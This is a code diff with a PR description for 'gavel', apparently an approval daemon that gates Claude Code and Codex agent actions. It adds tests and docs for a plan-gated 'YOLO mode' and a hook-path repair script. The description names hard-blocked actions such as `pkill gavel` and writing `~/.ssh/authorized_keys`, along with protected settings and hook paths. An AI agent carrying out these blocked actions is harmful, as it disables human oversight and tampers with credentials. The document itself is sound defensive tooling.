+    // MARK: - disengage
+
+    func testDisengageClearsStateAndSetsReason() {
+        session.lastPlanPath = planPath
+        YoloMode.engage(session: session)
+        waitForMain()
+        YoloMode.disengage(session: session, reason: "test reason")
+        XCTAssertFalse(session.isYoloActive, "sync flag must flip immediately on disengage")
+        waitForMain()
+        XCTAssertNil(session.yoloEngagedAt)
+        XCTAssertNil(session.yoloPlanPath)
+        XCTAssertNil(session.yoloPlanHash)
+        XCTAssertEqual(session.yoloDisabledReason, "test reason")
+    }
+
+    func testRevokeAutoApproveClearsYoloIncludingReason() {
+        session.lastPlanPath = planPath
+        YoloMode.engage(session: session)
+        waitForMain()
+        YoloMode.disengage(session: session, reason: "halt")
+        waitForMain()
+        XCTAssertEqual(session.yoloDisabledReason, "halt")
+        session.revokeAutoApprove()
+        XCTAssertNil(session.yoloDisabledReason, "revoke is a full reset — reason cleared too")
+        XCTAssertFalse(session.isYoloActive)
+    }
+
+    // MARK: - isPlanPath
+
+    func testIsPlanPathMatchesStandardPlan() {
+        let home = NSHomeDirectory()
+        XCTAssertTrue(YoloMode.isPlanPath("\(home)/.claude/plans/yolo-mode/2026-05-21_plan.md"))
+        XCTAssertTrue(YoloMode.isPlanPath("\(home)/.claude/plans/anything/whatever.md"))
+    }
+
+    func testIsPlanPathRejectsNonPlanPaths() {
+        let home = NSHomeDirectory()
+        XCTAssertFalse(YoloMode.isPlanPath("\(home)/.claude/plans/foo.md"), "must be in a sub-folder")
+        XCTAssertFalse(YoloMode.isPlanPath("\(home)/.claude/plans/folder/file.txt"), "must be .md")
+        XCTAssertFalse(YoloMode.isPlanPath("\(home)/.claude/settings.json"))
+        XCTAssertFalse(YoloMode.isPlanPath("/tmp/whatever.md"))
+    }
+}

--- a/justfile
+++ b/justfile
@@ -118,6 +118,72 @@ dev-daemon: build
     echo
     .build/release/gavel
 
+# Scan dev-volatile configs for paths under ~/code that reference gavel;
+# offer to reset them to brew paths. Catches the "deleted worktree leaves
+# stale hook config" failure mode (Codex/Claude hooks exit 127). Treat
+# local dev as a temporary state; run this after each dev sprint alongside
+# `just dev-restore`.
+dev-doctor:
+    #!/usr/bin/env bash
+    set -euo pipefail
+
+    brew_prefix=$(brew --prefix)
+    brew_hook="$brew_prefix/bin/gavel-hook"
+    brew_daemon="$brew_prefix/bin/gavel"
+    code_root="$HOME/code"
+
+    declare -a drift_files=()
+
+    scan() {
+        local file="$1"
+        [[ -f "$file" ]] || return 0
+        local pattern="\"${code_root}[^\"]*/(gavel-hook|gavel)\""
+        if grep -qE "$pattern" "$file" 2>/dev/null; then
+            echo
+            echo "DRIFT in $file:"
+            grep -nE "$pattern" "$file" | sed 's/^/    /'
+            drift_files+=("$file")
+        fi
+    }
+
+    scan "$HOME/.codex/config.toml"
+    scan "$HOME/.claude/settings.json"
+    scan "$HOME/.claude/settings.local.json"
+
+    if [[ ${#drift_files[@]} -eq 0 ]]; then
+        echo "OK: no dev-path drift in known config locations."
+        echo "  brew gavel-hook:   $brew_hook"
+        echo "  brew gavel daemon: $brew_daemon"
+        exit 0
+    fi
+
+    echo
+    echo "${#drift_files[@]} file(s) reference a path under $code_root for gavel."
+    echo "These were probably set by 'just dev-install' or manual hook edits."
+    echo "If the source path no longer exists, hooks will exit 127."
+    echo
+    read -r -p "Reset to brew paths? [y/N] " ans
+    if [[ ! "$ans" =~ ^[Yy]$ ]]; then
+        echo "No changes made."
+        exit 1
+    fi
+
+    stamp=$(date +%Y%m%d-%H%M%S)
+    for file in "${drift_files[@]}"; do
+        backup="${file}.pre-dev-doctor-${stamp}"
+        cp "$file" "$backup"
+        sed -i.tmp -E \
+            -e "s|${code_root}[^\"]*/gavel-hook\"|${brew_hook}\"|g" \
+            -e "s|${code_root}[^\"]*/gavel\"|${brew_daemon}\"|g" \
+            "$file"
+        rm -f "${file}.tmp"
+        echo "  fixed: $file  (backup: $backup)"
+    done
+
+    echo
+    echo "Done. Codex: re-trust the new hook path via interactive 'codex' + '/hooks'."
+    echo "Claude Code: no re-trust needed."
+
 # Restore Homebrew's signed binaries from the dev-install backup.
 dev-restore:
     #!/usr/bin/env bash


### PR DESCRIPTION
## Summary

- **YOLO mode**: per-session toggle that bypasses user-authored rules (persistent DENY/PROMPT/ALLOW + session rules) so the agent runs without prompts. Gated on a captured plan; auto-disengages on halt triggers.
- **Capture-on-write plan discovery**: any approved `Write`/`Edit`/`MultiEdit` under `~/.claude/plans/**/*.md` stamps `session.lastPlanPath`. No coupling to session labels or folder conventions.
- **Three retained protections under YOLO**: stage-1 hard-blocks (no halt), sensitive-path access (halt + dialog), scheduler tools `CronCreate`/`ScheduleWakeup`/`CronDelete` (dialog, no halt). Pause wins over YOLO.

## What changes for users

- **New YOLO button** in each SessionRow — orange when armed, filled-red when active, disabled when no plan has been captured this session.
- **Halt banner** surfaces when YOLO auto-disengages (with the reason), plus a macOS notification.
- **State persists** across daemon restarts via `active-sessions.json`; on rehydrate, the plan's hash is re-checked and YOLO is dropped with a clear reason if the file drifted while the daemon was down.

## Halt triggers

| Trigger | Behavior |
|---|---|
| Agent Write/Edit/MultiEdit on tracked plan path | dialog + halt, reason: "plan modified by agent" |
| Plan file sha256 drift since engage | dialog + halt, reason: "plan changed on disk" |
| Plan file deleted | dialog + halt, reason: "plan deleted" |
| `matchSensitivePath` hit (~/.claude/gavel/*, ~/.claude/settings.json, hooks/, shell init) | dialog + halt, reason: "gavel-protected path: …" |
| Manual disengage button | clean state, no banner |

Hard-blocks (`pkill gavel`, `~/.ssh/authorized_keys`, etc.) still deny outright — and crucially **do NOT disengage YOLO**, since the safety net held.

## Implementation notes

- `isYoloActive` is backed by a lock-guarded non-`@Published` flag so worker threads see `disengage()` synchronously. UI-display fields (`yoloEngagedAt`, `yoloPlanPath`, `yoloDisabledReason`) stay `@Published` and update on main.
- Sub-agents inherit YOLO via the existing `isSubAgentInheritEnabled` channel — set automatically on engage.
- `YoloMode.swift` is a stateless namespace; HookRouter + ApprovalEngine + UI all call into it. Single source of truth for plan-path matching, sha256, and state transitions.

## Test plan

- [x] `swift test` — 320/320 pass (24 new tests across `YoloModeTests` and `YoloApprovalEngineTests`)
- [x] `swift build -c release` — clean
- [x] Two-project soak via `just dev-daemon`: YOLO engaged simultaneously on independent sessions, user rules bypassed, halt triggers fire and route to interactive panel
- [x] Regression: built-in script-eval PROMPT rule (`python3 -c` / `ruby -e` / …) is bypassed under YOLO (only scheduler tools force dialog)

## Reference plan

`~/.claude/plans/yolo-mode/2026-05-21_09-52-55_plan-gated-yolo-mode.md`